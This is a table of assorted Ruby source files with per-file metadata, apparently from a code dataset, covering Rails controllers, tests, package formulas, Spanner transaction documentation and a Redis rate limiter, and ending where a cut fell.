hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e21b34126d2f61ae6a63a45af10d6a7908de9adb | 201 | module Datadog
module VERSION
MAJOR = 0
MINOR = 47
PATCH = 0
PRE = nil
STRING = [MAJOR, MINOR, PATCH, PRE].compact.join('.')
MINIMUM_RUBY_VERSION = '2.0.0'.freeze
end
end
| 15.461538 | 57 | 0.60199 |
1a34d45914adac0ae5471c2736fc07e1c1a5d6e2 | 306 | require_relative '../../helper'
require_relative 'shared_spec_behaviors'
class Repositext
class Validation
describe Rtfile do
include SharedSpecBehaviors
before {
@common_validation = Rtfile.new(
{:primary => ['_', '_', '_']}, {}
)
}
end
end
end
| 16.105263 | 43 | 0.594771 |
e2f1c58cba35e5a0b92c9353744d3786b180f403 | 492 | require 'yaml'
require 'active_record'
module Models
class RetrosheetEvent < ActiveRecord::Base
attr_accessor :column_mapping_memo
class << self
def column_mapping
column_mapping_memo ||= YAML::load_file(File.join(Retrodb::ROOT, 'config', 'retrosheet_database_mapping.yml'))
end
def column_names
names = []
column_mapping.map do |i, data|
names << data['db_column_name']
end
names
end
end
end
end
| 19.68 | 118 | 0.638211 |
6a12dff699d7ea8372558265854b9019c8304a21 | 1,199 | # @!group /service_manager/
# @method get_services_for_type
# @overload get '/v0/service_manager/persistent_services/:publisher_namespace/:type_path'
# Return array of services attached to the service :publisher_namespace/:type_path
# @return [Array]
get '/v0/service_manager/persistent_services/:publisher_namespace/*' do
begin
params[:type_path] = params['splat'][0]
cparams = assemble_params(params, [:publisher_namespace, :type_path], [])
return_json_array(engines_api.registered_with_service(cparams))
rescue StandardError => e
send_encoded_exception(request: request, exception: e)
end
end
#TODO finish this
#del '/v0/service_manager/persistent_service/del/:publisher_namespace/*' do
# begin
# p = params['splat'][0]
# te = p.dirname
# params[:service_handle] = p.basename
# params[:type_path] = te.dirname
# params[:parent_engine] = te.basename
# cparams = assemble_params(params, [:publisher_namespace, :type_path,:parent_engines,:service_handle], [])
# return_json_array(engines_api.force_deregister_persistent_service(cparams))
# rescue StandardError => e
# send_encoded_exception(request: request, exception: e)
# end
#end
# @!endgroup
| 36.333333 | 110 | 0.750626 |
b9cb71ae89a003f830c988914db2463f387409fe | 1,422 | # frozen_string_literal: true
class Profiles::KeysController < Profiles::ApplicationController
skip_before_action :authenticate_user!, only: [:get_keys]
def index
@keys = current_user.keys.order_id_desc
@key = Key.new
end
def show
@key = current_user.keys.find(params[:id])
end
def create
@key = Keys::CreateService.new(current_user, key_params.merge(ip_address: request.remote_ip)).execute
if @key.persisted?
redirect_to profile_key_path(@key)
else
@keys = current_user.keys.select(&:persisted?)
render :index
end
end
def destroy
@key = current_user.keys.find(params[:id])
Keys::DestroyService.new(current_user).execute(@key)
respond_to do |format|
format.html { redirect_to profile_keys_url, status: :found }
format.js { head :ok }
end
end
# Get all keys of a user(params[:username]) in a text format
# Helpful for sysadmins to put in respective servers
def get_keys
if params[:username].present?
begin
user = UserFinder.new(params[:username]).find_by_username
if user.present?
render plain: user.all_ssh_keys.join("\n")
else
return render_404
end
rescue => e
render html: e.message
end
else
return render_404
end
end
private
def key_params
params.require(:key).permit(:title, :key, :expires_at)
end
end
| 23.311475 | 105 | 0.664557 |
e9ae81c6fe2c3054122e6f66424a718c7a7aca55 | 665 | cask "preference-manager" do
version "4.5.2.0"
sha256 "780626b2e0a557f86e42ab899dadd727c1ef01f029ddd1ae98a4984365639971"
url "https://www.digitalrebellion.com/download/prefman?version=#{version.no_dots}"
name "Preference Manager"
desc "Trash, backup, lock and restore video editor preferences"
homepage "https://www.digitalrebellion.com/prefman/"
livecheck do
url "https://www.digitalrebellion.com/prefman/download"
strategy :page_match do |page|
match = page.match(%r{href=.*?/prefman\?version=(\d+(?:\.\d+)*)"}i)
next if match.blank?
match[1].gsub(/./, '\0.').chop.to_s
end
end
app "Preference Manager.app"
end
| 30.227273 | 84 | 0.702256 |
e823067c909c446154fdf9a9e00cb66dda9971ef | 387 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ContainerRegistry::Mgmt::V2019_06_01_preview
module Models
#
# Defines values for TriggerStatus
#
module TriggerStatus
Disabled = "Disabled"
Enabled = "Enabled"
end
end
end
| 22.764706 | 70 | 0.710594 |
61f7b3c6586fc6173043bdfc48cebdb10f144909 | 236 | class AddQuery < ActiveRecord::Migration[4.2]
def self.up
add_column :web_forms, :query, :text
add_column :web_vulns, :query, :text
end
def self.down
remove_column :web_forms, :query
remove_column :web_vulns, :query
end
end
| 21.454545 | 45 | 0.741525 |
bb234c7b64460886446639cad562cd26dc795ce4 | 1,586 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'bulma/css/version'
Gem::Specification.new do |spec|
spec.name = "bulma-css"
spec.version = Bulma::Css::VERSION
spec.authors = ["Ankur Singh"]
spec.email = ["[email protected]"]
spec.summary = "Ruby gem to integrate bulma css to rails"
spec.description = "Adds bulma.css to the rails asset pipeline"
spec.homepage = "https://github.com/rush-skills/bulma-css"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org by setting 'allowed_push_host', or
# delete this section to allow pushing this gem to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "https://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.require_paths = ["lib"]
spec.add_dependency 'railties', '>= 3.1'
spec.add_development_dependency "bundler", "~> 1.11"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency 'rails', '>= 3.1'
spec.post_install_message = "Thank you for installation bulma-css. \n\n" \
"**********************************************\n\n" \
"You can now use it by adding\n\n" \
"*= require bulma\n\n" \
"to your application.css file.\n\n" \
"Happy hacking!\n\n" \
"**********************************************\n"
end
| 37.761905 | 104 | 0.618537 |
e9585590e526dfa946d94f8e8e8559d7387f5de8 | 181 | require "test_helper"
class DashboardControllerTest < ActionDispatch::IntegrationTest
test "should get home" do
get dashboard_home_url
assert_response :success
end
end
| 20.111111 | 63 | 0.790055 |
bb969ec880f727fba5cda57fd94628e125e3a62c | 2,333 | require "rails_helper"
require "shared_rutines"
RSpec.describe LocalesController, type: :controller do
describe "#default_locale" do
before do
I18n.default_locale = :en
I18n.available_locales = %i[en en-US es]
cookies.permanent[:locale] = nil
request.headers["Accept-Language"] = nil
end
it "sets the default locale without hints" do
put :default_locale
expect(cookies.permanent[:locale]).to eq(I18n.default_locale)
end
it "sets the default locale with broser hints" do
request.headers["Accept-Language"] = "es;q=1.0"
put :default_locale
expect(cookies.permanent[:locale]).to eq(:es)
end
end
describe "#site_locale" do
before do
I18n.default_locale = :en
I18n.available_locales = %i[en en-US es]
cookies.permanent[:locale] = nil
end
it "sets a simple locale from the supported list" do
patch :site_locale, params: { locale: :es }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a composed locale from the supported list" do
patch :site_locale, params: { locale: :"en-US" }
expect(cookies.permanent[:locale]).to eq(:"en-US")
end
it "sets a simple locale from a partially supported composed locale" do
patch :site_locale, params: { locale: :"es-GT" }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a default locale from an unsupported locale" do
request.headers["Accept-Language"] = nil
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(I18n.default_locale)
end
it "sets a browser-prefered somple locale from an unsupported locale" do
request.headers["Accept-Language"] = "es;q=1.0"
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a browser-prefered composed locale from an unsupported locale" do
request.headers["Accept-Language"] = "es-GT;q=1.0"
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "changes the locale after it's set" do
patch :site_locale, params: { locale: :"en-US" }
patch :site_locale, params: { locale: :es }
expect(cookies.permanent[:locale]).to eq(:es)
end
end
end
| 32.402778 | 78 | 0.657951 |
1da55e93ce9f28db27b3a05d6508428dac9f11b0 | 760 | require 'matrix'
module ML
module Learner
# Implementation of linear regression
class LinearRegressionLearner
include Toolbox
include LinearToolbox
# Intialize linear regression
#
# @param [Integer] dim the input dimension
def initialize dim
@dim = dim
end
# Train with supervised data
#
# @param [Hash] data supervised input data (mapping from array to integer)
def train! data
x = Matrix.rows(data.keys)
ary_y = []
for k in data.keys
ary_y << data[k]
end
y = Matrix.column_vector(ary_y)
x_t = x.transpose
x_dag = (x_t * x).inverse * x_t
self.current_vector = x_dag * y
end
end
end
end | 22.352941 | 80 | 0.586842 |
d5da59be14fbd4920e3cd155ae95e7c72e965e2d | 176 | class InstanceController < ApplicationController
def getInstance
instance_hash = {current_instance: ENV['INSTANCE']}
render json: instance_hash, status: :ok
end
end | 29.333333 | 55 | 0.767045 |
181d088bfa2eaf041a4632eb77d962ab02ccf058 | 1,497 | class Asymptote < Formula
desc "Powerful descriptive vector graphics language"
homepage "https://asymptote.sourceforge.io"
url "https://downloads.sourceforge.net/project/asymptote/2.62/asymptote-2.62.src.tgz"
sha256 "60b085316b65af6a0e5132a8451c13b642cfe91c9096dc35d43b7b77a9dd2014"
bottle do
sha256 "64b808892251efca9174dedbca7c7053771d5f6ea84777562a6a92275ba1b50f" => :catalina
sha256 "ee051fe8dd1b6162d5686c0a0f8a0fc9dd6268c7befc72952721f6f6ab5f7413" => :mojave
sha256 "cc10a84f49fd48428e79d8f5792335c5b4f4dcf51be79c1a013f946321c7e82d" => :high_sierra
end
depends_on "fftw"
depends_on "ghostscript"
depends_on "glm"
depends_on "gsl"
resource "manual" do
url "https://downloads.sourceforge.net/project/asymptote/2.62/asymptote.pdf"
sha256 "afd22e35f984a6187ea4064f217dc167ff897864db23b825d4cbd78cd7114710"
end
def install
system "./configure", "--prefix=#{prefix}"
# Avoid use of MacTeX with these commands
# (instead of `make all && make install`)
touch buildpath/"doc/asy-latex.pdf"
system "make", "asy"
system "make", "asy-keywords.el"
system "make", "install-asy"
doc.install resource("manual")
(share/"emacs/site-lisp").install_symlink pkgshare
end
test do
(testpath/"line.asy").write <<~EOF
settings.outformat = "pdf";
size(200,0);
draw((0,0)--(100,50),N,red);
EOF
system "#{bin}/asy", testpath/"line.asy"
assert_predicate testpath/"line.pdf", :exist?
end
end
| 31.851064 | 93 | 0.728123 |
285681bfb793bfc5a0e03aa5c5580efe5ea22342 | 1,046 | #
# Be sure to run `pod lib lint NavigationRoute.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'NavigationRoute'
s.version = '1.0.0'
s.summary = 'StackView Navigation.'
s.description = <<-DESC
iOS StackView Navigation Tool
DESC
s.homepage = 'https://github.com/zerojian/NavigationRoute'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'zerojian' => '[email protected]' }
s.source = { :git => 'https://github.com/ZeroJian/NavigationRoute.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.swift_version = '4.0'
s.source_files = 'NavigationRoute/Classes/**/*'
s.dependency "SnapKit"
end
| 30.764706 | 108 | 0.624283 |
2801d57c78c9b479dacf11161061a504048cae7a | 220 | require 'support/file_system_support'
RSpec.configure do |config|
config.filter_run :focus => true
config.run_all_when_everything_filtered = true
config.treat_symbols_as_metadata_keys_with_true_values = true
end
| 24.444444 | 63 | 0.827273 |
bbe1262c2989c44de94d6f33bc62a088c61d2e0b | 300 | #!/usr/bin/env ruby
require 'rubygems'
require 'gosu'
require 'ruby/snake/game/window'
module Ruby
module Snake
# Game entry point
class GameApp
def initialize
@game_window = Game::Window.new
end
def start
@game_window.show
end
end
end
end
| 13.636364 | 39 | 0.623333 |
d52f432ad483f498f6af78b6bc76187db78a09b5 | 22,577 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Spanner
module V1
# = Transactions
#
# Each session can have at most one active transaction at a time. After the
# active transaction is completed, the session can immediately be
# re-used for the next transaction. It is not necessary to create a
# new session for each transaction.
#
# = Transaction Modes
#
# Cloud Spanner supports three transaction modes:
#
# 1. Locking read-write. This type of transaction is the only way
# to write data into Cloud Spanner. These transactions rely on
# pessimistic locking and, if necessary, two-phase commit.
# Locking read-write transactions may abort, requiring the
# application to retry.
#
# 2. Snapshot read-only. This transaction type provides guaranteed
# consistency across several reads, but does not allow
# writes. Snapshot read-only transactions can be configured to
# read at timestamps in the past. Snapshot read-only
# transactions do not need to be committed.
#
# 3. Partitioned DML. This type of transaction is used to execute
# a single Partitioned DML statement. Partitioned DML partitions
# the key space and runs the DML statement over each partition
# in parallel using separate, internal transactions that commit
# independently. Partitioned DML transactions do not need to be
# committed.
#
# For transactions that only read, snapshot read-only transactions
# provide simpler semantics and are almost always faster. In
# particular, read-only transactions do not take locks, so they do
# not conflict with read-write transactions. As a consequence of not
# taking locks, they also do not abort, so retry loops are not needed.
#
# Transactions may only read/write data in a single database. They
# may, however, read/write data in different tables within that
# database.
#
# == Locking Read-Write Transactions
#
# Locking transactions may be used to atomically read-modify-write
# data anywhere in a database. This type of transaction is externally
# consistent.
#
# Clients should attempt to minimize the amount of time a transaction
# is active. Faster transactions commit with higher probability
# and cause less contention. Cloud Spanner attempts to keep read locks
# active as long as the transaction continues to do reads, and the
# transaction has not been terminated by
# {Google::Spanner::V1::Spanner::Commit Commit} or
# {Google::Spanner::V1::Spanner::Rollback Rollback}. Long periods of
# inactivity at the client may cause Cloud Spanner to release a
# transaction's locks and abort it.
#
# Conceptually, a read-write transaction consists of zero or more
# reads or SQL statements followed by
# {Google::Spanner::V1::Spanner::Commit Commit}. At any time before
# {Google::Spanner::V1::Spanner::Commit Commit}, the client can send a
# {Google::Spanner::V1::Spanner::Rollback Rollback} request to abort the
# transaction.
#
# === Semantics
#
# Cloud Spanner can commit the transaction if all read locks it acquired
# are still valid at commit time, and it is able to acquire write
# locks for all writes. Cloud Spanner can abort the transaction for any
# reason. If a commit attempt returns `ABORTED`, Cloud Spanner guarantees
# that the transaction has not modified any user data in Cloud Spanner.
#
# Unless the transaction commits, Cloud Spanner makes no guarantees about
# how long the transaction's locks were held for. It is an error to
# use Cloud Spanner locks for any sort of mutual exclusion other than
# between Cloud Spanner transactions themselves.
#
# === Retrying Aborted Transactions
#
# When a transaction aborts, the application can choose to retry the
# whole transaction again. To maximize the chances of successfully
# committing the retry, the client should execute the retry in the
# same session as the original attempt. The original session's lock
# priority increases with each consecutive abort, meaning that each
# attempt has a slightly better chance of success than the previous.
#
# Under some circumstances (e.g., many transactions attempting to
# modify the same row(s)), a transaction can abort many times in a
# short period before successfully committing. Thus, it is not a good
# idea to cap the number of retries a transaction can attempt;
# instead, it is better to limit the total amount of wall time spent
# retrying.
#
# === Idle Transactions
#
# A transaction is considered idle if it has no outstanding reads or
# SQL queries and has not started a read or SQL query within the last 10
# seconds. Idle transactions can be aborted by Cloud Spanner so that they
# don't hold on to locks indefinitely. In that case, the commit will
# fail with error `ABORTED`.
#
# If this behavior is undesirable, periodically executing a simple
# SQL query in the transaction (e.g., `SELECT 1`) prevents the
# transaction from becoming idle.
#
# == Snapshot Read-Only Transactions
#
# Snapshot read-only transactions provides a simpler method than
# locking read-write transactions for doing several consistent
# reads. However, this type of transaction does not support writes.
#
# Snapshot transactions do not take locks. Instead, they work by
# choosing a Cloud Spanner timestamp, then executing all reads at that
# timestamp. Since they do not acquire locks, they do not block
# concurrent read-write transactions.
#
# Unlike locking read-write transactions, snapshot read-only
# transactions never abort. They can fail if the chosen read
# timestamp is garbage collected; however, the default garbage
# collection policy is generous enough that most applications do not
# need to worry about this in practice.
#
# Snapshot read-only transactions do not need to call
# {Google::Spanner::V1::Spanner::Commit Commit} or
# {Google::Spanner::V1::Spanner::Rollback Rollback} (and in fact are not
# permitted to do so).
#
# To execute a snapshot transaction, the client specifies a timestamp
# bound, which tells Cloud Spanner how to choose a read timestamp.
#
# The types of timestamp bound are:
#
# * Strong (the default).
# * Bounded staleness.
# * Exact staleness.
#
# If the Cloud Spanner database to be read is geographically distributed,
# stale read-only transactions can execute more quickly than strong
# or read-write transaction, because they are able to execute far
# from the leader replica.
#
# Each type of timestamp bound is discussed in detail below.
#
# === Strong
#
# Strong reads are guaranteed to see the effects of all transactions
# that have committed before the start of the read. Furthermore, all
# rows yielded by a single read are consistent with each other -- if
# any part of the read observes a transaction, all parts of the read
# see the transaction.
#
# Strong reads are not repeatable: two consecutive strong read-only
# transactions might return inconsistent results if there are
# concurrent writes. If consistency across reads is required, the
# reads should be executed within a transaction or at an exact read
# timestamp.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#strong TransactionOptions::ReadOnly#strong}.
#
# === Exact Staleness
#
# These timestamp bounds execute reads at a user-specified
# timestamp. Reads at a timestamp are guaranteed to see a consistent
# prefix of the global transaction history: they observe
# modifications done by all transactions with a commit timestamp <=
# the read timestamp, and observe none of the modifications done by
# transactions with a larger commit timestamp. They will block until
# all conflicting transactions that may be assigned commit timestamps
# <= the read timestamp have finished.
#
# The timestamp can either be expressed as an absolute Cloud Spanner commit
# timestamp or a staleness relative to the current time.
#
# These modes do not require a "negotiation phase" to pick a
# timestamp. As a result, they execute slightly faster than the
# equivalent boundedly stale concurrency modes. On the other hand,
# boundedly stale reads usually return fresher results.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#read_timestamp TransactionOptions::ReadOnly#read_timestamp} and
# {Google::Spanner::V1::TransactionOptions::ReadOnly#exact_staleness TransactionOptions::ReadOnly#exact_staleness}.
#
# === Bounded Staleness
#
# Bounded staleness modes allow Cloud Spanner to pick the read timestamp,
# subject to a user-provided staleness bound. Cloud Spanner chooses the
# newest timestamp within the staleness bound that allows execution
# of the reads at the closest available replica without blocking.
#
# All rows yielded are consistent with each other -- if any part of
# the read observes a transaction, all parts of the read see the
# transaction. Boundedly stale reads are not repeatable: two stale
# reads, even if they use the same staleness bound, can execute at
# different timestamps and thus return inconsistent results.
#
# Boundedly stale reads execute in two phases: the first phase
# negotiates a timestamp among all replicas needed to serve the
# read. In the second phase, reads are executed at the negotiated
# timestamp.
#
# As a result of the two phase execution, bounded staleness reads are
# usually a little slower than comparable exact staleness
# reads. However, they are typically able to return fresher
# results, and are more likely to execute at the closest replica.
#
# Because the timestamp negotiation requires up-front knowledge of
# which rows will be read, it can only be used with single-use
# read-only transactions.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#max_staleness TransactionOptions::ReadOnly#max_staleness} and
# {Google::Spanner::V1::TransactionOptions::ReadOnly#min_read_timestamp TransactionOptions::ReadOnly#min_read_timestamp}.
#
# === Old Read Timestamps and Garbage Collection
#
# Cloud Spanner continuously garbage collects deleted and overwritten data
# in the background to reclaim storage space. This process is known
# as "version GC". By default, version GC reclaims versions after they
# are one hour old. Because of this, Cloud Spanner cannot perform reads
# at read timestamps more than one hour in the past. This
# restriction also applies to in-progress reads and/or SQL queries whose
# timestamp become too old while executing. Reads and SQL queries with
# too-old read timestamps fail with the error `FAILED_PRECONDITION`.
#
# == Partitioned DML Transactions
#
# Partitioned DML transactions are used to execute DML statements with a
# different execution strategy that provides different, and often better,
# scalability properties for large, table-wide operations than DML in a
# ReadWrite transaction. Smaller scoped statements, such as an OLTP workload,
# should prefer using ReadWrite transactions.
#
# Partitioned DML partitions the keyspace and runs the DML statement on each
# partition in separate, internal transactions. These transactions commit
# automatically when complete, and run independently from one another.
#
# To reduce lock contention, this execution strategy only acquires read locks
# on rows that match the WHERE clause of the statement. Additionally, the
# smaller per-partition transactions hold locks for less time.
#
# That said, Partitioned DML is not a drop-in replacement for standard DML used
# in ReadWrite transactions.
#
# * The DML statement must be fully-partitionable. Specifically, the statement
# must be expressible as the union of many statements which each access only
# a single row of the table.
#
# * The statement is not applied atomically to all rows of the table. Rather,
# the statement is applied atomically to partitions of the table, in
# independent transactions. Secondary index rows are updated atomically
# with the base table rows.
#
# * Partitioned DML does not guarantee exactly-once execution semantics
# against a partition. The statement will be applied at least once to each
# partition. It is strongly recommended that the DML statement should be
# idempotent to avoid unexpected results. For instance, it is potentially
# dangerous to run a statement such as
# `UPDATE table SET column = column + 1` as it could be run multiple times
# against some rows.
#
# * The partitions are committed automatically - there is no support for
# Commit or Rollback. If the call returns an error, or if the client issuing
# the ExecuteSql call dies, it is possible that some rows had the statement
# executed on them successfully. It is also possible that statement was
# never executed against other rows.
#
# * Partitioned DML transactions may only contain the execution of a single
# DML statement via ExecuteSql or ExecuteStreamingSql.
#
# * If any error is encountered during the execution of the partitioned DML
# operation (for instance, a UNIQUE INDEX violation, division by zero, or a
# value that cannot be stored due to schema constraints), then the
# operation is stopped at that point and an error is returned. It is
# possible that at this point, some partitions have been committed (or even
# committed multiple times), and other partitions have not been run at all.
#
# Given the above, Partitioned DML is good fit for large, database-wide,
# operations that are idempotent, such as deleting old rows from a very large
# table.
# @!attribute [rw] read_write
# @return [Google::Spanner::V1::TransactionOptions::ReadWrite]
# Transaction may write.
#
# Authorization to begin a read-write transaction requires
# `spanner.databases.beginOrRollbackReadWriteTransaction` permission
# on the `session` resource.
# @!attribute [rw] partitioned_dml
# @return [Google::Spanner::V1::TransactionOptions::PartitionedDml]
# Partitioned DML transaction.
#
# Authorization to begin a Partitioned DML transaction requires
# `spanner.databases.beginPartitionedDmlTransaction` permission
# on the `session` resource.
# @!attribute [rw] read_only
# @return [Google::Spanner::V1::TransactionOptions::ReadOnly]
# Transaction will not write.
#
# Authorization to begin a read-only transaction requires
# `spanner.databases.beginReadOnlyTransaction` permission
# on the `session` resource.
class TransactionOptions
# Message type to initiate a read-write transaction. Currently this
# transaction type has no options.
class ReadWrite; end
# Message type to initiate a Partitioned DML transaction.
class PartitionedDml; end
# Message type to initiate a read-only transaction.
# @!attribute [rw] strong
# @return [true, false]
# Read at a timestamp where all previously committed transactions
# are visible.
# @!attribute [rw] min_read_timestamp
# @return [Google::Protobuf::Timestamp]
# Executes all reads at a timestamp >= `min_read_timestamp`.
#
# This is useful for requesting fresher data than some previous
# read, or data that is fresh enough to observe the effects of some
# previously committed transaction whose timestamp is known.
#
# Note that this option can only be used in single-use transactions.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
# @!attribute [rw] max_staleness
# @return [Google::Protobuf::Duration]
# Read data at a timestamp >= `NOW - max_staleness`
# seconds. Guarantees that all writes that have committed more
# than the specified number of seconds ago are visible. Because
# Cloud Spanner chooses the exact timestamp, this mode works even if
# the client's local clock is substantially skewed from Cloud Spanner
# commit timestamps.
#
# Useful for reading the freshest data available at a nearby
# replica, while bounding the possible staleness if the local
# replica has fallen behind.
#
# Note that this option can only be used in single-use
# transactions.
# @!attribute [rw] read_timestamp
# @return [Google::Protobuf::Timestamp]
# Executes all reads at the given timestamp. Unlike other modes,
# reads at a specific timestamp are repeatable; the same read at
# the same timestamp always returns the same data. If the
# timestamp is in the future, the read will block until the
# specified timestamp, modulo the read's deadline.
#
# Useful for large scale consistent reads such as mapreduces, or
# for coordinating many reads against a consistent snapshot of the
# data.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
# @!attribute [rw] exact_staleness
# @return [Google::Protobuf::Duration]
# Executes all reads at a timestamp that is `exact_staleness`
# old. The timestamp is chosen soon after the read is started.
#
# Guarantees that all writes that have committed more than the
# specified number of seconds ago are visible. Because Cloud Spanner
# chooses the exact timestamp, this mode works even if the client's
# local clock is substantially skewed from Cloud Spanner commit
# timestamps.
#
# Useful for reading at nearby replicas without the distributed
# timestamp negotiation overhead of `max_staleness`.
# @!attribute [rw] return_read_timestamp
# @return [true, false]
# If true, the Cloud Spanner-selected read timestamp is included in
# the {Google::Spanner::V1::Transaction Transaction} message that describes the transaction.
class ReadOnly; end
end
# A transaction.
# @!attribute [rw] id
# @return [String]
# `id` may be used to identify the transaction in subsequent
# {Google::Spanner::V1::Spanner::Read Read},
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql},
# {Google::Spanner::V1::Spanner::Commit Commit}, or
# {Google::Spanner::V1::Spanner::Rollback Rollback} calls.
#
# Single-use read-only transactions do not have IDs, because
# single-use transactions do not support multiple requests.
# @!attribute [rw] read_timestamp
# @return [Google::Protobuf::Timestamp]
# For snapshot read-only transactions, the read timestamp chosen
# for the transaction. Not returned by default: see
# {Google::Spanner::V1::TransactionOptions::ReadOnly#return_read_timestamp TransactionOptions::ReadOnly#return_read_timestamp}.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
class Transaction; end
# This message is used to select the transaction in which a
# {Google::Spanner::V1::Spanner::Read Read} or
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql} call runs.
#
# See {Google::Spanner::V1::TransactionOptions TransactionOptions} for more information about transactions.
# @!attribute [rw] single_use
# @return [Google::Spanner::V1::TransactionOptions]
# Execute the read or SQL query in a temporary transaction.
# This is the most efficient way to execute a transaction that
# consists of a single SQL query.
# @!attribute [rw] id
# @return [String]
# Execute the read or SQL query in a previously-started transaction.
# @!attribute [rw] begin
# @return [Google::Spanner::V1::TransactionOptions]
# Begin a new transaction and execute this read or SQL query in
# it. The transaction ID of the new transaction is returned in
# {Google::Spanner::V1::ResultSetMetadata#transaction ResultSetMetadata#transaction}, which is a {Google::Spanner::V1::Transaction Transaction}.
class TransactionSelector; end
end
end
end | 52.261574 | 154 | 0.673296 |
1c454aef7e5112fe225d8842a77da77d0b33ec81 | 4,271 | require 'redis'
require 'redis-namespace'
class Ratelimit
# Create a RateLimit object.
#
# @param [String] key A name to uniquely identify this rate limit. For example, 'emails'
# @param [Hash] options Options hash
# @option options [Integer] :bucket_span (600) Time span to track in seconds
# @option options [Integer] :bucket_interval (5) How many seconds each bucket represents
# @option options [Integer] :bucket_expiry (@bucket_span) How long we keep data in each bucket before it is auto expired. Cannot be larger than the bucket_span.
# @option options [Redis] :redis (nil) Redis client if you need to customize connection options
#
# @return [RateLimit] RateLimit instance
#
def initialize(key, options = {})
@key = key
unless options.is_a?(Hash)
raise ArgumentError.new("Redis object is now passed in via the options hash - options[:redis]")
end
@bucket_span = options[:bucket_span] || 600
@bucket_interval = options[:bucket_interval] || 5
@bucket_expiry = options[:bucket_expiry] || @bucket_span
if @bucket_expiry > @bucket_span
raise ArgumentError.new("Bucket expiry cannot be larger than the bucket span")
end
@redis = options[:redis]
@redis_proc = @redis.respond_to?(:to_proc)
end
# Add to the counter for a given subject.
#
# @param [String] subject A unique key to identify the subject. For example, '[email protected]'
# @param [Integer] count The number by which to increase the counter
#
# @return [Integer] The counter value
def add(subject, count = 1)
subject = "#{@key}:#{subject}:#{get_bucket}"
with_redis do |redis|
redis.multi do
redis.incrby(subject, count)
redis.expire(subject, @bucket_expiry)
end.first
end
end
# Returns the count for a given subject and interval
#
# @param [String] subject Subject for the count
# @param [Integer] interval How far back (in seconds) to retrieve activity.
def count(subject, interval)
bucket = get_bucket
interval = [interval, @bucket_interval].max
count = (interval / @bucket_interval).floor
subject = "#{@key}:#{subject}"
keys = (0..count - 1).map {|i| "#{subject}:#{bucket - i}" }
with_redis do |redis|
return redis.mget(*keys).inject(0) {|a, i| a + i.to_i}
end
end
# Check if the rate limit has been exceeded.
#
# @param [String] subject Subject to check
# @param [Hash] options Options hash
# @option options [Integer] :interval How far back to retrieve activity.
# @option options [Integer] :threshold Maximum number of actions
def exceeded?(subject, options = {})
return count(subject, options[:interval]) >= options[:threshold]
end
# Check if the rate limit is within bounds
#
# @param [String] subject Subject to check
# @param [Hash] options Options hash
# @option options [Integer] :interval How far back to retrieve activity.
# @option options [Integer] :threshold Maximum number of actions
def within_bounds?(subject, options = {})
return !exceeded?(subject, options)
end
# Execute a block once the rate limit is within bounds
# *WARNING* This will block the current thread until the rate limit is within bounds.
#
# @param [String] subject Subject for this rate limit
# @param [Hash] options Options hash
# @option options [Integer] :interval How far back to retrieve activity.
# @option options [Integer] :threshold Maximum number of actions
# @yield The block to be run
#
# @example Send an email as long as we haven't send 5 in the last 10 minutes
# ratelimit.exec_with_threshold(email, [:threshold => 5, :interval => 600]) do
# send_another_email
# end
def exec_within_threshold(subject, options = {}, &block)
options[:threshold] ||= 30
options[:interval] ||= 30
while exceeded?(subject, options)
sleep @bucket_interval
end
yield(self)
end
private
def get_bucket(time = Time.now.to_i)
(time / @bucket_interval).floor
end
def with_redis
if @redis_proc
@redis.call do |redis|
yield Redis::Namespace.new(:ratelimit, redis: redis)
end
else
@redis ||= Redis::Namespace.new(:ratelimit, :redis => @redis || Redis.new)
yield @redis
end
end
end
| 34.723577 | 162 | 0.681339 |
08641b3e10ae5a4da376eed0a0cd27ce6f1ed13d | 57 | module Corelb
# corelb version
VERSION = "0.1.0"
end
| 11.4 | 19 | 0.666667 |
ed1944f337323262abfc220e01b0d87aa36fb65d | 1,814 | # == Schema Information
#
# Table name: services
#
